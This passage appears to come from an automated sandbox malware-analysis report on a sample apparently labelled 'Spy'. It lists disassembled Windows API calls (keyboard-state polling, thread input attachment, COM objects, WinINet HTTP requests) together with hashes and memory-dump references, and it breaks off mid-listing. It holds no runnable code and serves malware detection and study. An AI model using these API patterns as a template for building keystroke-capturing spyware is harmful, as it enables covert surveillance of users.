                                                      • VariantClear.OLEAUT32(?), ref: 00AD790C
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD7917
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 6c6e9103dd8b4c16b54752c80708cf6f9f4e669e5832618072ebe741fde81d59
                                                      • Instruction ID: fec05702a363486291d8a74a493e2352e44daccbd554f0e26a5e25e219a29b0e
                                                      • Opcode Fuzzy Hash: 6c6e9103dd8b4c16b54752c80708cf6f9f4e669e5832618072ebe741fde81d59
                                                      • Instruction Fuzzy Hash: DC415235A041199FCB04EFA4D8889EDBBB9FF48340F40C069E956A7361DB70AA85CF90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AE0530
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AE05B1
                                                      • GetKeyState.USER32(000000A0), ref: 00AE05CC
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AE05E6
                                                      • GetKeyState.USER32(000000A1), ref: 00AE05FB
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AE0613
                                                      • GetKeyState.USER32(00000011), ref: 00AE0625
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AE063D
                                                      • GetKeyState.USER32(00000012), ref: 00AE064F
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AE0667
                                                      • GetKeyState.USER32(0000005B), ref: 00AE0679
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
                                                      • Instruction ID: a8f861f2c5411b2feca859db13d38fa68a65b3c9dba653dbe9e8d158cd62b548
                                                      • Opcode Fuzzy Hash: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
                                                      • Instruction Fuzzy Hash: 6541D7305047CA6DFF319B658804BB6BEA16B61304F48C05AD9C6575C2EBE899D8CFB2
                                                      APIs
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • CoInitialize.OLE32 ref: 00AF8AED
                                                      • CoUninitialize.OLE32 ref: 00AF8AF8
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00B13BBC,?), ref: 00AF8B58
                                                      • IIDFromString.OLE32(?,?), ref: 00AF8BCB
                                                      • VariantInit.OLEAUT32(?), ref: 00AF8C65
                                                      • VariantClear.OLEAUT32(?), ref: 00AF8CC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: 6a8dabc463d52e8fbdc69c0f2e6f4673c3cebe08831584d197672a04435d5ff0
                                                      • Instruction ID: 590b3be31264fbd2ae6788591ff22ec4248c7c73d93c77c27d87d32b88b1d917
                                                      • Opcode Fuzzy Hash: 6a8dabc463d52e8fbdc69c0f2e6f4673c3cebe08831584d197672a04435d5ff0
                                                      • Instruction Fuzzy Hash: B061AF702087159FC710EF94C988F6EB7E4AF49714F104849FA859B291DB78ED49CBA2
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00AEBB13
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AEBB89
                                                      • GetLastError.KERNEL32 ref: 00AEBB93
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00AEBC00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
                                                      • Instruction ID: e1341a57840656949638470e363ad23539eb7ef802b69b5940b4bcd423d60c86
                                                      • Opcode Fuzzy Hash: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
                                                      • Instruction Fuzzy Hash: 7531B735A10249AFCB10EF66C949EAEB7B4EF44310F24815AF505DB295DB709D41CBA1
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AD9BCC
                                                      • GetDlgCtrlID.USER32 ref: 00AD9BD7
                                                      • GetParent.USER32 ref: 00AD9BF3
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9BF6
                                                      • GetDlgCtrlID.USER32(?), ref: 00AD9BFF
                                                      • GetParent.USER32(?), ref: 00AD9C1B
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
                                                      • Instruction ID: b5fbef77746939a958c1e7e4f83a6e4efb8c025826b99e43cd00f6fc34dc1f8f
                                                      • Opcode Fuzzy Hash: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
                                                      • Instruction Fuzzy Hash: D421CF74A00204BFCF04ABA0CC85EFEBBB9EF95310F604156F962932A1DF759865DA20
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AD9CB5
                                                      • GetDlgCtrlID.USER32 ref: 00AD9CC0
                                                      • GetParent.USER32 ref: 00AD9CDC
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9CDF
                                                      • GetDlgCtrlID.USER32(?), ref: 00AD9CE8
                                                      • GetParent.USER32(?), ref: 00AD9D04
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9D07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                      • Instruction ID: f247a370841d67b0fb90f1ea3f48909e1796174b22da7d939d9f908b0a5e4dbf
                                                      • Opcode Fuzzy Hash: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                      • Instruction Fuzzy Hash: 3921D075E40204BFDF00ABA0CC85EFEBBB9EF94300F604016F952A32A1DF758965DA20
                                                      APIs
                                                      • GetParent.USER32 ref: 00AD9D27
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00AD9D3C
                                                      • _wcscmp.LIBCMT ref: 00AD9D4E
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AD9DC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                      • Instruction ID: 602846d95fc27d3fe08d05ff1d7ebdf5512929c3cc367e3a4f3f6d01b567e304
                                                      • Opcode Fuzzy Hash: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                      • Instruction Fuzzy Hash: FD112977248302BAFE002724EC06DE773EDDB19720F304167FA42A61E1FFA5AE515951
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AF8FC1
                                                      • CoInitialize.OLE32(00000000), ref: 00AF8FEE
                                                      • CoUninitialize.OLE32 ref: 00AF8FF8
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00AF90F8
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AF9225
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B13BDC), ref: 00AF9259
                                                      • CoGetObject.OLE32(?,00000000,00B13BDC,?), ref: 00AF927C
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00AF928F
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AF930F
                                                      • VariantClear.OLEAUT32(?), ref: 00AF931F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                      • Instruction ID: 7aa17d8429b8a648fe287459863f3db9e709064e2e4d59c0856b1cefaaf47f17
                                                      • Opcode Fuzzy Hash: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                      • Instruction Fuzzy Hash: 06C13971608309AFC700EF68C884A6BB7E9FF89748F00495DF68A9B251DB71ED45CB52
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AE19EF
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A03
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00AE1A0A
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A19
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE1A2B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A44
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A56
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A9B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1AB0
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1ABB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                      • Instruction ID: f28ed71d283426c6876d3f16e8fbe015d10f3e20a17b05f464b0d3a538d66940
                                                      • Opcode Fuzzy Hash: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                      • Instruction Fuzzy Hash: 0231EE79611254BFEB20AF11DC88FBD37AAFB56399F908125F800C7190CFB49E848B20
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00A8260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                      • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                      • GetStockObject.GDI32(00000005), ref: 00A82634
                                                      • GetClientRect.USER32(?), ref: 00ABC0FC
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ABC113
                                                      • GetWindowDC.USER32(?), ref: 00ABC11F
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00ABC12E
                                                      • ReleaseDC.USER32(?,00000000), ref: 00ABC140
                                                      • GetSysColor.USER32(00000005), ref: 00ABC15E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                      • String ID:
                                                      • API String ID: 3430376129-0
                                                      • Opcode ID: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                      • Instruction ID: 6c8ce6449cb824b1470042c96f1ee9f606bbca0ba730e6fa0b904e5e5e26206d
                                                      • Opcode Fuzzy Hash: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                      • Instruction Fuzzy Hash: 28116D31510205FFDB616FA4EC48BE97BB6EB14331F508225FA65A60E1CFB10A91EF10
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A8ADE1
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00A8AE80
                                                      • UnregisterHotKey.USER32(?), ref: 00A8AFD7
                                                      • DestroyWindow.USER32(?), ref: 00AC2F64
                                                      • FreeLibrary.KERNEL32(?), ref: 00AC2FC9
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AC2FF6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                      • Instruction ID: 4e84b5c44b242d32c18d6d673aa6f4ba811e96c8fabb4b06b7c38bc6221c013c
                                                      • Opcode Fuzzy Hash: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                      • Instruction Fuzzy Hash: 83A16A317012228FDB29EF14C594F69F3B4BF14700F5582ADE90AAB261DB31AD52CF91
                                                      APIs
                                                      • EnumChildWindows.USER32(?,00ADB13A), ref: 00ADB078
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                      • Instruction ID: 42ebf2e2bbff0452e6724f194638582eb8543fca84b8cf1442b5e4f1cc5bbbfc
                                                      • Opcode Fuzzy Hash: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                      • Instruction Fuzzy Hash: 3B918471600606EACB18EF60C581BEEFBB5BF15300F64815AE85BA7391DF306959CBA1
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00A8327E
                                                        • Part of subcall function 00A8218F: GetClientRect.USER32(?,?), ref: 00A821B8
                                                        • Part of subcall function 00A8218F: GetWindowRect.USER32(?,?), ref: 00A821F9
                                                        • Part of subcall function 00A8218F: ScreenToClient.USER32(?,?), ref: 00A82221
                                                      • GetDC.USER32 ref: 00ABD073
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ABD086
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00ABD094
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00ABD0A9
                                                      • ReleaseDC.USER32(?,00000000), ref: 00ABD0B1
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ABD13C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                      • Instruction ID: 12e9c3be6fddc806db09ca1888516be3bf90d4f3da6a6f1f5f7b224e5444841a
                                                      • Opcode Fuzzy Hash: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                      • Instruction Fuzzy Hash: 5871E331404205EFCF21EF68C884AFA7BB9FF59320F144269ED565A1A6EB318D51DF60
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                        • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                        • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                        • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                        • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B0C69C
                                                      • ImageList_EndDrag.COMCTL32 ref: 00B0C6A2
                                                      • ReleaseCapture.USER32 ref: 00B0C6A8
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00B0C752
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B0C765
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B0C847
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 0d6ebe2d0d424fc4095bf82cdc45d88b99bed7ede990a46d737d4c3d2f9b4434
                                                      • Instruction ID: 8e0da3b8ca6e79d8349a3b1be9509c97ce99a3c53466f0ebab2c3aa49a30e52b
                                                      • Opcode Fuzzy Hash: 0d6ebe2d0d424fc4095bf82cdc45d88b99bed7ede990a46d737d4c3d2f9b4434
                                                      • Instruction Fuzzy Hash: 6C517875208305AFDB14EF24CC5AFAA7BE1FB88310F108A59F595872E1DB70AA45CB52
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF211C
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AF2148
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AF218A
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AF219F
